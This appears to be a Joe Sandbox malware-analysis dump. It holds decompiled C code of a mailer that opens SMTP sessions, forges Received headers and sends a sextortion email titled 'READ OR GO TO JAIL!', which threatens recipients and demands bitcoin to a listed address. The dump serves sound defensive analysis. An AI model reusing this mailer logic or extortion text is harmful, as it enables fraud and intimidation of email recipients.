                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902146
                                                                                                                                                                                                                                                                  0x0090214a
                                                                                                                                                                                                                                                                  0x00902152
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x00902167
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902167
                                                                                                                                                                                                                                                                  0x00901a62

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 009021B0: strchr.MSVCRT ref: 009021BB
                                                                                                                                                                                                                                                                    • Part of subcall function 009010A0: DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,00000000,00000000), ref: 009010C4
                                                                                                                                                                                                                                                                    • Part of subcall function 009010A0: htons.WS2_32(00000019), ref: 009010F5
                                                                                                                                                                                                                                                                    • Part of subcall function 009010A0: DnsFree.DNSAPI(00000000,00000001), ref: 0090110F
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00901A32
                                                                                                                                                                                                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 00901A59
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(000000FF,00000006,00000001,00000001,00000004), ref: 00901A83
                                                                                                                                                                                                                                                                  • shutdown.WS2_32(000000FF,00000002), ref: 00902170
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0090217A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeQuery_closesocketconnecthtonssetsockoptshutdownsocketstrchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3655475579-0
                                                                                                                                                                                                                                                                  • Opcode ID: d08cdde6ded52f5a61244e626e48c43b6ef4056b7bd4b9a1f4bcef7dbd3293c3
                                                                                                                                                                                                                                                                  • Instruction ID: 3c14b96fca71e87841bc0912e3572821819e68e575f716717ebbbf3b2449e62d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d08cdde6ded52f5a61244e626e48c43b6ef4056b7bd4b9a1f4bcef7dbd3293c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD414F71D08218DFDF64CBA4CC89BEEB7B9BB48304F004198E619A62D0D7795A85CF91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 290 901c27-901c62 wsprintfA call 901120 293 901c70-901c77 290->293 294 901c64-901c6b 290->294 295 902159 293->295 294->295 297 901a9a-901a9e 295->297 298 90215e-90217a shutdown closesocket 295->298 297->298 299 901aa4-901ab4 call 901160 297->299 302 902180-902186 298->302 303 901ab9-901ac9 299->303 304 901ad0-901aef call 9011c0 303->304 305 901acb 303->305 308 901af1 304->308 309 901af6-901b15 304->309 305->298 308->298 309->295 310 901b1b 309->310 310->295
                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00901C27(void* __eflags) {
                                                                                                                                                                                                                                                                  				void* _t157;
                                                                                                                                                                                                                                                                  				intOrPtr _t161;
                                                                                                                                                                                                                                                                  				void* _t162;
                                                                                                                                                                                                                                                                  				void* _t187;
                                                                                                                                                                                                                                                                  				void* _t189;
                                                                                                                                                                                                                                                                  				void* _t191;
                                                                                                                                                                                                                                                                  				void* _t193;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t187 - 0x49c)) = wsprintfA(_t187 - 0x490, "RCPT TO: <%s>\r\n",  *((intOrPtr*)(_t187 + 8)));
                                                                                                                                                                                                                                                                  					_t157 = E00901120( *((intOrPtr*)(_t187 - 0x1c)), _t187 - 0x490,  *((intOrPtr*)(_t187 - 0x49c))); // executed
                                                                                                                                                                                                                                                                  					_t191 = _t189 + 0x18;
                                                                                                                                                                                                                                                                  					if(_t157 != 0) {
                                                                                                                                                                                                                                                                  						 *(_t187 - 0x20) = 5;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L46:
                                                                                                                                                                                                                                                                  					while( *(_t187 - 0x20) != 0 &&  *(_t187 - 0x20) != 8) {
                                                                                                                                                                                                                                                                  						_t161 = E00901160( *((intOrPtr*)(_t187 - 0x1c)), _t187 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                  						_t193 = _t191 + 0xc;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t187 - 0x90)) = _t161;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t187 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                  							L5:
                                                                                                                                                                                                                                                                  							 *((char*)(_t187 +  *((intOrPtr*)(_t187 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                  							_t162 = E009011C0(_t187 - 0x490);
                                                                                                                                                                                                                                                                  							_t191 = _t193 + 4;
                                                                                                                                                                                                                                                                  							if(_t162 != 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *(_t187 - 0x718) =  *(_t187 - 0x20);
                                                                                                                                                                                                                                                                  								 *(_t187 - 0x718) =  *(_t187 - 0x718) - 1;
                                                                                                                                                                                                                                                                  								if( *(_t187 - 0x718) > 6) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L8:
                                                                                                                                                                                                                                                                  								switch( *((intOrPtr*)( *(_t187 - 0x718) * 4 +  &M00902188))) {
                                                                                                                                                                                                                                                                  									case 0:
                                                                                                                                                                                                                                                                  										L9:
                                                                                                                                                                                                                                                                  										_push("ESMTP");
                                                                                                                                                                                                                                                                  										if(StrStrA(_t187 - 0x490) == 0) {
                                                                                                                                                                                                                                                                  											_t166 = wsprintfA(_t187 - 0x490, "HELO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t194 = _t191 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t187 - 0x494) = _t166;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t169 = wsprintfA(_t187 - 0x490, "EHLO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t194 = _t191 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t187 - 0x494) = _t169;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t168 = E00901120( *((intOrPtr*)(_t187 - 0x1c)), _t187 - 0x490,  *(_t187 - 0x494)); // executed
                                                                                                                                                                                                                                                                  										_t191 = _t194 + 0xc;
                                                                                                                                                                                                                                                                  										if(_t168 != 0) {
                                                                                                                                                                                                                                                                  											 *(_t187 - 0x20) = 3;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(_t187 - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 1:
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 2:
                                                                                                                                                                                                                                                                  										L16:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 3:
                                                                                                                                                                                                                                                                  										goto L0;
                                                                                                                                                                                                                                                                  									case 4:
                                                                                                                                                                                                                                                                  										L21:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 5:
                                                                                                                                                                                                                                                                  										L24:
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                  										E00901320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__ebp - 0x710 = E00901490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                  										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  										__eax = E00901490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t57 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t61 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t65 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xd2;
                                                                                                                                                                                                                                                                  										_t69 = __eax % 0xd2;
                                                                                                                                                                                                                                                                  										E00901390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t69 + 1, _t65 + 1, _t61 + 1, _t57 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                  											E00901320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                  											__eax = E00901320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                  											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  											__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                                                                                                                                  												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  												__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                                                                                                                                  													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  													if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "READ OR GO TO JAIL!");
                                                                                                                                                                                                                                                                  														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  														if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                  															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  															if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                  																E00901320(__ecx, 6, __ecx) = E00901320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                  																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																	if(E00901120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																		if(E00901120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcpy(__ebp - 0x610, "Hi, I keep the whole story short.\r\n\r\n") = strcat(__ebp - 0x610, "Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Check the sender of this email, I sent it from your email account.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "It won\'t take a long time to send your data with the proof of your activities to the police.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Once I get the payment, I will remove everything, be sure, I keep my promises.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcat(__ebp - 0x610, "Next time keep your device updated with the newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																			if(E00901120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                  																			} else {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																			}
                                                                                                                                                                                                                                                                  																		} else {
                                                                                                                                                                                                                                                                  																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																		}
                                                                                                                                                                                                                                                                  																	} else {
                                                                                                                                                                                                                                                                  																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																	}
                                                                                                                                                                                                                                                                  																} else {
                                                                                                                                                                                                                                                                  																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															} else {
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 6:
                                                                                                                                                                                                                                                                  										L45:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L47:
                                                                                                                                                                                                                                                                  					 *(_t187 - 8) = 0 |  *(_t187 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                  					__imp__#22( *((intOrPtr*)(_t187 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t187 - 0x1c)));
                                                                                                                                                                                                                                                                  					return  *(_t187 - 8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c40
                                                                                                                                                                                                                                                                  0x00901c58
                                                                                                                                                                                                                                                                  0x00901c5d
                                                                                                                                                                                                                                                                  0x00901c62
                                                                                                                                                                                                                                                                  0x00901c70
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902159
                                                                                                                                                                                                                                                                  0x00901ab4
                                                                                                                                                                                                                                                                  0x00901ab9
                                                                                                                                                                                                                                                                  0x00901abc
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x00901ad0
                                                                                                                                                                                                                                                                  0x00901ad6
                                                                                                                                                                                                                                                                  0x00901ae5
                                                                                                                                                                                                                                                                  0x00901aea
                                                                                                                                                                                                                                                                  0x00901aef
                                                                                                                                                                                                                                                                  0x00901af6
                                                                                                                                                                                                                                                                  0x00901af9
                                                                                                                                                                                                                                                                  0x00901b08
                                                                                                                                                                                                                                                                  0x00901b15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b1b
                                                                                                                                                                                                                                                                  0x00901b21
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b3c
                                                                                                                                                                                                                                                                  0x00901b71
                                                                                                                                                                                                                                                                  0x00901b77
                                                                                                                                                                                                                                                                  0x00901b7a
                                                                                                                                                                                                                                                                  0x00901b3e
                                                                                                                                                                                                                                                                  0x00901b4f
                                                                                                                                                                                                                                                                  0x00901b55
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b92
                                                                                                                                                                                                                                                                  0x00901b97
                                                                                                                                                                                                                                                                  0x00901b9c
                                                                                                                                                                                                                                                                  0x00901baa
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bbf
                                                                                                                                                                                                                                                                  0x00901bc6
                                                                                                                                                                                                                                                                  0x00901bcc
                                                                                                                                                                                                                                                                  0x00901bdb
                                                                                                                                                                                                                                                                  0x00901be2
                                                                                                                                                                                                                                                                  0x00901be8
                                                                                                                                                                                                                                                                  0x00901beb
                                                                                                                                                                                                                                                                  0x00901bf1
                                                                                                                                                                                                                                                                  0x00901bff
                                                                                                                                                                                                                                                                  0x00901c03
                                                                                                                                                                                                                                                                  0x00901c0d
                                                                                                                                                                                                                                                                  0x00901c1b
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901c7c
                                                                                                                                                                                                                                                                  0x00901c83
                                                                                                                                                                                                                                                                  0x00901c87
                                                                                                                                                                                                                                                                  0x00901c91
                                                                                                                                                                                                                                                                  0x00901c9f
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cc9
                                                                                                                                                                                                                                                                  0x00901ccf
                                                                                                                                                                                                                                                                  0x00901cdd
                                                                                                                                                                                                                                                                  0x00901cea
                                                                                                                                                                                                                                                                  0x00901cf2
                                                                                                                                                                                                                                                                  0x00901cfb
                                                                                                                                                                                                                                                                  0x00901d0a
                                                                                                                                                                                                                                                                  0x00901d11
                                                                                                                                                                                                                                                                  0x00901d16
                                                                                                                                                                                                                                                                  0x00901d17
                                                                                                                                                                                                                                                                  0x00901d1c
                                                                                                                                                                                                                                                                  0x00901d1c
                                                                                                                                                                                                                                                                  0x00901d22
                                                                                                                                                                                                                                                                  0x00901d27
                                                                                                                                                                                                                                                                  0x00901d28
                                                                                                                                                                                                                                                                  0x00901d2d
                                                                                                                                                                                                                                                                  0x00901d2d
                                                                                                                                                                                                                                                                  0x00901d33
                                                                                                                                                                                                                                                                  0x00901d38
                                                                                                                                                                                                                                                                  0x00901d39
                                                                                                                                                                                                                                                                  0x00901d3e
                                                                                                                                                                                                                                                                  0x00901d3e
                                                                                                                                                                                                                                                                  0x00901d44
                                                                                                                                                                                                                                                                  0x00901d49
                                                                                                                                                                                                                                                                  0x00901d4a
                                                                                                                                                                                                                                                                  0x00901d4f
                                                                                                                                                                                                                                                                  0x00901d6c
                                                                                                                                                                                                                                                                  0x00901d73
                                                                                                                                                                                                                                                                  0x00901d79
                                                                                                                                                                                                                                                                  0x00901d7c
                                                                                                                                                                                                                                                                  0x00901d82
                                                                                                                                                                                                                                                                  0x00901d90
                                                                                                                                                                                                                                                                  0x00901d94
                                                                                                                                                                                                                                                                  0x00901d9e
                                                                                                                                                                                                                                                                  0x00901dac
                                                                                                                                                                                                                                                                  0x00901dc5
                                                                                                                                                                                                                                                                  0x00901dce
                                                                                                                                                                                                                                                                  0x00901ddc
                                                                                                                                                                                                                                                                  0x00901de3
                                                                                                                                                                                                                                                                  0x00901de9
                                                                                                                                                                                                                                                                  0x00901dec
                                                                                                                                                                                                                                                                  0x00901df9
                                                                                                                                                                                                                                                                  0x00901e00
                                                                                                                                                                                                                                                                  0x00901e04
                                                                                                                                                                                                                                                                  0x00901e0e
                                                                                                                                                                                                                                                                  0x00901e25
                                                                                                                                                                                                                                                                  0x00901e2c
                                                                                                                                                                                                                                                                  0x00901e32
                                                                                                                                                                                                                                                                  0x00901e35
                                                                                                                                                                                                                                                                  0x00901e3b
                                                                                                                                                                                                                                                                  0x00901e49
                                                                                                                                                                                                                                                                  0x00901e4d
                                                                                                                                                                                                                                                                  0x00901e57
                                                                                                                                                                                                                                                                  0x00901e65
